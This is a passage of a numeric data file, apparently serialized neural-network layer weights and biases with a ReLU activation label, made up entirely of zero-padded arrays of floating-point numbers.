-0.03232, 0.03174, -0.05206, -0.05325, 0.0001295, -0.02391, -0.004417, -0.03204, 0.011116, 0.008766], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.592, -0.3884, -0.1678, -0.0655, 0.183, 0.698, -0.3647, 0.771, -0.534, 0.539, -0.0887, -0.1632, 1.151, -0.03192, -0.09106, -0.00798, 0.2546, 0.3015, 0.632, 0.7334, 0.9917, -0.286, -0.1753, -0.03195, -0.02014, -0.1527, -0.288, -0.637, -1.514, 0.2357, -0.2374, 0.586, -1.125, 0.5737, 0.1517, -0.357, -2.467, -0.1937, 0.0533, -1.337, -0.2456, -0.3247, -0.07324, 0.02368, -0.04834, -2.475, -2.1, -0.02179, 0.11053, 0.1755], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.984, 0.9106, -0.06003, 0.3533, -1.19, 0.08, -0.7715, -0.5244, 0.3088, 0.7847, 0.3833, -0.945, 0.799, -0.3813, 1.482, -0.001999, -1.095, -0.342, -0.8804, 0.1289, 0.5537, -0.653, -0.4495, 0.006344, -0.015114, 0.348, 0.2, 0.00622, 0.2084, -0.519, -0.0797, -0.5625, -0.0155, -0.00979, -0.5376, -0.5776, 0.372, -0.672, -0.2625, -0.7188, 0.091, -0.2134, 0.0982, -0.3584, 0.7183, -3.219, 0.6636, -0.4282, -0.784, -0.3499], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.846, 0.0521, -0.7188, 0.00411, -0.2334, 0.2783, -0.1953, 0.1158, -0.1621, 0.1744, 0.649, 0.3489, -0.4849, -0.569, -0.625, -0.04797, 1.114, -0.1593, 0.5776, -0.08746, -0.02403, -0.1058, 0.1597, 0.00694, -0.001555, 0.3938, -0.0768, -1.007, -0.4622, 0.004616, 0.336, -0.2001, 0.4067, -0.01878, 0.303, 
-0.5874, 0.3247, 0.1593, -0.01173, -0.3599, 0.1318, 0.12366, -0.09753, -0.2676, 0.412, 0.4204, 0.4587, 0.315, 0.0391, 0.684], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.111, 0.02592, 0.3792, 0.217, -0.4417, -0.1416, 0.324, -0.1509, -0.01467, 0.769, -0.07526, 0.778, 0.10187, 0.06415, -0.02304, 0.0259, 0.889, -0.01772, 0.4146, -0.2385, -0.1246, -0.0326, -0.2418, -0.02151, 0.02054, 0.3252, 0.3245, -0.01877, -1.649, 0.0956, 0.3037, -0.2935, -1.104, 0.5156, -0.923, -0.205, 0.315, -0.3108, -0.07214, 0.849, 0.7305, 0.8936, 0.565, 0.10614, -0.11676, -0.8145, -0.2617, -0.5234, -1.16, -0.1366], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.017, -4.055, -0.263, -0.572, 0.1775, 0.756, 0.556, -0.772, -2.693, -0.10046, -4.395, -0.1504, 0.8115, -0.0733, 0.936, 0.03305, 0.2279, -1.1455, -0.5127, 0.06555, 0.04193, 0.2678, 0.02539, 0.02536, 0.01563, 0.2527, -0.02927, 0.001789, 1.974, 0.4001, -0.233, -0.3088, 1.801, 0.1512, -1.555, -0.882, 1.053, 0.3123, -0.09796, 2.164, -0.2185, 0.2861, 1.054, -0.1609, 0.0529, -0.668, -0.6157, 0.2324, -0.0828, 0.0254], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01701, 0.02853, -0.04102, -0.01299, -0.001672, -0.02386, -0.03268, -0.04907, -0.04428, -0.0324, -0.00787, -0.003067, -0.05087, 0.00864, -0.03732, -0.00416, -0.0568, -0.00934, -0.06113, 0.01079, 0.00421, 0.02187, -0.04932, 0.03067, -0.00762, -0.02794, -0.01071, 0.0008273, 
-0.02737, -0.0476, 0.02185, -0.03497, 0.003864, -0.01281, -0.04025, 0.00832, 0.01723, -0.0008526, -0.001273, -0.002316, 0.0368, 0.01953, 0.02718, -0.04434, 0.01187, -0.01999, -0.0356, -0.00439, 0.01326, 0.010925], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0501, 0.601, -0.4858, 0.3984, -0.722, -0.7656, -0.1956, -0.2097, -0.5947, 0.293, -0.2004, -0.6772, -0.595, 0.1312, -0.1884, -0.01756, -0.6343, -0.00901, -0.0629, -0.5386, -0.1615, 0.10016, 0.576, 0.05984, -0.001458, -0.7397, 0.5376, 0.3652, -0.445, 0.4773, 0.687, 0.1129, 1.293, -0.4424, -0.2349, -0.4463, -0.106, -0.4622, 0.719, -0.89, -0.296, -0.1893, 0.4456, 0.02519, 0.0127, 0.6567, -0.327, -1.444, 0.3088, 0.578], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1015, -1.333, -0.4768, -0.6074, 1.162, 0.3662, -0.4783, -1.545, 0.0948, -0.3767, 0.3867, -0.809, 0.068, -1.289, -0.6465, -0.014915, -0.4475, 0.0982, -0.3413, -0.03525, -0.5923, -0.722, 0.2996, -0.03091, 0.00943, 0.3127, -0.645, 0.5483, 3.865, -0.2168, -0.9526, -0.03073, -0.2678, 0.814, 0.568, 2.568, -1.275, 1.116, 0.0364, 1.108, 1.012, 1.35, -2.27, -0.3445, -0.1108, -0.573, 0.875, -2.963, -0.6367, 0.351], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.11884, -0.712, -0.484, -0.711, 0.2242, 0.5044, -1.071, 0.1448, 0.442, -0.432, 0.336, -0.4387, 0.0901, 0.383, 0.5205, -0.02791, 0.4722, 0.2766, 0.5684, 0.06006, -0.4216, 0.2112, -0.5073, 0.02367, 
-0.002958, -0.05112, 0.8022, 0.06146, 2.994, -0.1592, -0.5215, 0.608, 0.368, -0.0924, -1.003, -0.297, 0.1687, 0.1744, 0.3608, -0.7583, -0.745, -0.4688, 0.1473, -0.7314, 0.0857, -3.418, -1.042, -1.06, -0.2281, 0.3542], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02312, -0.01912, 0.013115, 0.0142, -0.02498, -0.01662, -0.00534, -0.05475, -0.01198, -0.0007586, 0.02611, -0.03128, -0.04874, 0.02045, 0.02309, -0.0267, 0.02768, -0.0513, 0.02632, 0.012375, -0.04977, -0.02419, 0.02316, -0.015335, 0.004887, -0.011, -0.01646, -0.0445, -0.02513, -0.02544, 0.03635, -0.000539, 0.005127, -0.01866, 0.03014, -0.04703, -0.02531, -0.00574, 0.01267, -0.005993, -0.05048, -0.02353, 0.00216, 0.01884, -0.00475, -0.0495, -0.0431, 0.00986, -0.010635, -0.05447], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00899, -0.00992, -0.0654, -0.00634, 0.0315, -0.003717, 0.02011, 0.02623, -0.05954, 0.01477, 0.00936, -0.04532, -0.0513, 0.0288, -0.03494, 0.02727, -0.04446, 0.01509, -0.01158, 0.01062, -0.0565, -0.01997, -0.018, 0.03265, 0.000317, -0.04437, 0.04187, -0.02005, 0.02148, -0.001552, -0.04218, 0.0058, 0.01019, -0.005627, -0.03656, -0.001269, -0.01115, -0.02415, 0.02156, -0.0151, -0.0414, -0.03027, -0.01307, 0.03102, -0.049, -0.03513, 0.041, -0.04163, 0.0219, -0.025], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4177, 0.1783, -0.1592, 0.007565, 0.3633, 0.293, -0.0006638, -0.35, 
-0.01898, -0.3005, -0.1312, 0.3254, -0.398, 0.2383, 0.3357, 0.001966, 0.08936, -0.06143, 0.2474, 0.1542, -0.1104, 0.4697, -0.2437, 0.02998, 0.001185, -1.405, 0.0589, 0.06854, 0.877, -0.281, -0.193, 0.2212, -0.945, 0.1736, -0.3237, -0.2205, -0.1636, 0.1719, -0.02174, -0.3699, 0.0906, -0.2612, 0.166, 0.3042, 0.1302, -0.2089, 0.1047, 0.05698, -0.4722, 0.00827], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3528, 0.09125, -0.293, 0.4446, -0.672, 0.7144, 0.66, -0.9175, -0.1646, 0.02899, -2.848, -0.4216, -0.3855, 0.9165, -0.4832, 0.01391, -0.4038, -2.52, -0.4595, 0.1116, -0.2047, 0.1494, 0.1324, 0.0392, 0.02989, 0.9985, -0.53, -0.1819, -0.7207, -0.0584, -0.6953, -2.238, 0.2566, 0.1927, 0.3733, -0.877, 0.906, 0.656, -0.1772, 0.0885, 0.43, -0.2207, -0.0472, 0.8164, -0.000985, 0.6455, 0.00651, 0.803, 0.309, 0.2634], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03543, 0.7573, 0.1488, 0.03293, -0.4612, 0.3086, 0.9756, 0.612, 0.373, -0.2325, 1.08, 1.475, -0.2605, -0.9194, 0.7896, -0.0006332, -0.666, 0.1877, -0.1409, 0.693, -0.08234, 1.022, -0.5234, -0.01515, -0.01643, -0.4526, 0.5107, 0.7036, 1.5, -0.596, -0.02388, -0.6587, -1.008, 0.831, 0.2966, -0.2605, -1.3125, 0.2378, -0.0084, -0.9336, -0.2472, 0.377, 0.5757, -0.5347, -0.593, 0.7764, -1.357, -1.325, -0.6514, 0.0227]]
[0.912087, -1.10685, 0.137794, -0.168459, -1.42421, 0.787138, -0.124085, 1.3736, -0.00859633, -0.651856, 0.145405, 0.0652822, -0.0841456, -0.0115158, -0.998676, 0.218436, 0.505745, -0.568693, -0.0247987, -0.133928, -0.016517, -0.942378, -0.263868, 0.76542, -0.109887, -0.82618, 0.394328, -0.447269, 0.298651, -0.237186, 0.540693, -0.715828, 0.659396, -0.286652, -0.998394, -0.0237047, -0.213427, 0.331735, -0.857676, -1.37676, -0.954094, -0.0253784, 0.0309685, -0.749332, 0.0661743, -0.0357525, -0.0224549, -0.515813, -0.634611, -0.265024, 0.912, -1.106, 0.1378, -0.1685, -1.424, 0.787, -0.1241, 1.374, -0.0086, -0.652, 0.1454, 0.0653, -0.08417, -0.01151, -0.9985, 0.2184, 0.506, -0.569, -0.0248, -0.1339, -0.01651, -0.9424, -0.264, 0.7656, -0.10986, -0.826, 0.3943, -0.4473, 0.2986, -0.2372, 0.5405, -0.716, 0.659, -0.2866, -0.9985, -0.02371, -0.2134, 0.3318, -0.858, -1.377, -0.954, -0.02538, 0.03098, -0.7495, 0.06616, -0.03577, -0.02246, -0.5156, -0.635, -0.2651]
ReLU
[[0.271949, 0.512019, 0.422585, -0.0321031, -0.206024, 0.393246, 0.804279, 0.367912, 0.0123004, 0.189081, 0.201671, 0.616549, -0.0266517, -0.0037589, 0.316717, 0.473881, -0.00959905, 0.211184, -0.0321328, 0.0180846, 0.028831, -1.79184, -0.21782, -0.413211, 0.154019, -0.284619, -0.155439, 0.472377, -0.1749, -0.416063, 0.0213886, -0.452012, 0.473652, 1.22063, -2.29487, -0.0223064, -0.260153, 0.234868, 0.241203, 0.315482, 0.276062, 0.0165337, -0.322751, -0.0661323, 0.741115, 0.0256236, 0.0124232, 0.768492, 0.64826, -0.0325234, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.246193, -0.0237456, 0.165561, -0.0853276, 0.0974237, 0.0180937, -0.0194636, 0.0045679, 0.0145314, -0.16837, 0.0931833, -0.0227176, 0.0484886, 0.00994968, 0.0680939, -0.133679, -0.14988, 0.0439148, 0.0248997, -0.118244, -0.0526062, 0.0273782, -0.0346477, 0.0558963, 0.118343, -0.26601, -0.0807286, -0.230834, -0.214336, -0.0999274, -0.206176, 0.0759019, -0.248978, 0.145935, -0.405872, -0.0223286, -0.148892, -0.0858001, -0.154383, 0.117089, -0.000781516, -0.00245355, 0.172322, -0.0640278, 0.0870513, 0.0412612, 0.0429608, 0.0144501, 0.0213466, -0.0572681, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.348064, 0.275401, -0.276797, 0.430612, 0.165869, 0.00953433, 0.0204052, -0.0595682, -0.0428368, 0.388766, -0.0413196, -0.319918, -0.647822, -0.0056935, 0.18271, -0.106225, 0.0440489, 0.734474, -0.0392018, -0.0875623, 0.0482078, 0.103628, 1.16295, 0.202931, 0.115736, -0.00846257, -0.109788, 0.557641, 0.119226, -0.0228916, 0.0106816, -0.170102, -0.440805, -0.405067, -0.169677, 0.0260662, -0.415728, 
-0.0105482, 0.475071, 0.148709, 0.039315, 0.00588011, 0.73053, -0.0108851, 0.0984433, -0.0157205, 0.0372195, 1.09959, -0.0187228, -0.301979, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.579094, 1.52373, -0.026886, -1.75065, -1.78209, -0.72128, 1.3038, -0.0884506, 0.0214799, 1.60637, -1.13732, -0.318843, -0.619158, -0.0249144, 1.12584, -0.364895, -1.64756, 1.93937, -0.0382276, -1.48138, 0.024982, 1.22698, -1.71283, -0.886178, 0.0978122, -0.171004, -0.247903, 0.327873, 0.967812, -0.578115, -0.760313, 0.0205029, -0.0762541, -1.49011, 3.57408, 0.00591744, -0.436708, 0.740607, 0.569299, -0.218021, 0.616508, -0.023734, 0.468529, -0.0877025, -0.909949, -0.0489067, 0.0330287, -0.786574, 0.870809, 0.943854, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.322396, -0.0713585, 0.609395, -0.580845, 0.243254, 0.198099, 1.25461, 0.0407065, 0.0349382, -0.289258, 0.379686, -0.0294219, 0.0549545, -0.0334332, -0.541847, -0.456731, -0.0618922, 0.0169075, 0.0396913, 0.325121, -0.0111307, 0.349285, -0.594415, -0.0190424, 0.00326467, 0.562036, -0.75562, -0.354659, 0.682411, 0.754096, 0.152794, 0.158089, 0.474438, 0.0986289, -3.13819, 0.030419, -0.079289, 0.370129, -0.131625, -0.0318, -0.525068, 0.0465938, 0.593939, 0.0936457, -0.229049, 0.0175572, 0.00135867, -0.488019, -0.556685, -0.401094, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.358858, 1.07785, 0.743704, 0.534735, 
1.28319, 0.612087, -1.07687, -0.299037, 0.0158099, 0.866619, -0.943901, 0.17306, 0.363409, -0.00531556, 0.539324, 1.08283, -0.127382, 0.566731, -0.010557, 0.336808, -0.028703, -0.214068, 0.544311, 0.287946, 0.132668, 0.00271036, 0.140591, 0.56339, -0.304448, -0.504718, 0.329524, -0.470984, 0.285756, -0.989648, 0.103825, 0.00612824, 0.21539, 0.477639, 0.225677, 1.18505, 0.0384696, -0.0386904, 0.231029, 0.0307064, -0.685649, -0.0262519, -0.0271563, 1.90799, 0.899768, -0.162232, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.18861, 0.109209, 0.425834, -0.115479, 0.23461, -0.255114, 0.00538916, -0.624438, 0.0211935, -0.182278, 0.206605, 0.583968, 0.158284, 0.00188872, 0.525434, -0.0912172, 0.221657, 0.479023, 0.014828, -0.098439, -0.0409894, -0.308829, 0.195309, 0.0580535, -0.0664931, 0.137732, -0.145333, -0.145576, -0.454602, -0.21621, 0.235531, 0.0511211, 0.460514, 0.728351, -1.14555, -0.0215425, 0.0784065, 0.168373, -0.350257, 0.110489, 0.5184, -0.00664132, -0.325855, -0.0695803, -0.369236, -0.01615, 0.0014409, 0.701695, 0.199358, -0.291411, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.274289, -0.120391, -0.331651, -0.564438, -0.702278, 0.191083, 0.665742, 0.242902, 0.0130251, -0.399274, -0.459494, 0.250312, 0.0519729, 0.0218159, -0.121835, 0.3309, -0.0995712, 0.144351, 0.0349663, 0.417257, 0.0488571, 0.281239, -0.531963, 0.374611, 0.131153, 0.117653, -0.00273073, 0.922583, 0.0957064, 0.168717, 0.077685, 0.242904, -0.415533, -0.614069, 0.494131, 0.0432462, 0.277914, 0.167785, -0.104656, -0.0419871, -0.97231, -0.0354682, -0.306967, 0.162947, 0.354106, 
-0.0174505, 0.0139338, -1.87703, -0.589777, 0.256253, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.326116, 1.38173, 0.162859, -1.00328, -2.56311, -0.164605, 1.75882, 0.120376, -0.0406069, -0.873924, -0.426187, 0.48344, -0.0960247, -0.0123661, -0.285594, 0.178636, 0.2037, -0.243988, 0.0324751, 0.536628, -0.00232481, -0.525837, -0.100397, -0.189083, 0.138317, 0.593191, 0.237433, -0.512329, 0.106529, -0.236459, -0.337619, -0.349448, -1.34718, -0.875758, -1.80461, -0.0485087, 0.276302, -0.374485, 0.166501, 0.0588986, 0.0667003, 0.0078468, -0.0627737, -0.0781425, -0.0269832, -0.0239702, -0.00941517, -0.822482, 0.0620264, -0.0829399, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.186947, 0.466458, -0.77397, 0.136826, -0.242964, 0.0426521, 0.497589, -0.28078, 0.00188819, 0.0334078, 0.115658, 0.49142, -0.0590964, -0.0468512, -1.96659, 0.0828754, -0.657453, -1.04333, 0.0253487, -0.223365, -0.0388406, -0.140886, 0.824181, 0.240997, 0.0285802, 0.270032, -0.0623165, -0.0641766, 0.0416566, -0.424149, -0.195135, -0.25654, -0.626693, 0.00560728, -1.16393, 0.0459598, -0.00786647, -0.00887003, -0.342144, 0.602044, 0.129861, 0.0255492, -0.355551, 0.00653958, 0.333029, 0.0316755, -0.0357401, 0.636095, 0.433844, 0.132161, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.18016, -1.75495, -0.558082, 0.430265, 0.128952, -0.564562, 1.94266, 0.465259, 0.0199097, -0.254367, 
0.303566, -1.42133, -2.82355, -0.0309917, -0.445566, -2.62343, 1.12455, -1.96585, 0.0194018, -0.435638, 0.0323872, 0.137836, 2.01299, -0.119152, -0.0357685, -0.52612, -0.494889, 0.362265, -0.471987, 0.351038, 0.506195, 0.00873942, 0.460577, 0.114337, -1.79841, -0.0210329, 0.285732, 0.0866808, -0.0427738, 0.419651, -5.44934, -0.03758, 0.164647, 0.567569, 0.786496, -0.0445705, 0.0246402, 1.84533, -1.12015, -0.0437157, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0882252, -1.32797, -0.116958, -0.347048, 0.169114, 0.0446385, -2.62635, -1.48754, 0.00489798, -0.32866, -0.0790013, 0.2238, -0.693589, 0.0252846, 0.506258, -0.0537526, 0.9992, -0.775884, 0.000928232, 0.0663224, -0.0288892, 0.177885, 0.345041, -0.355451, 0.00437184, -0.887209, 0.800238, -0.261547, -0.627339, -0.00710077, -0.085518, 0.00781268, 1.07369, -0.903241, -0.685605, -0.00852319, 0.195908, 0.404549, 0.462221, -0.310193, 0.638543, -0.0296251, -0.840895, 0.272721, 1.28778, -0.0406326, -0.0350067, -0.677412, 0.319501, 0.078329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 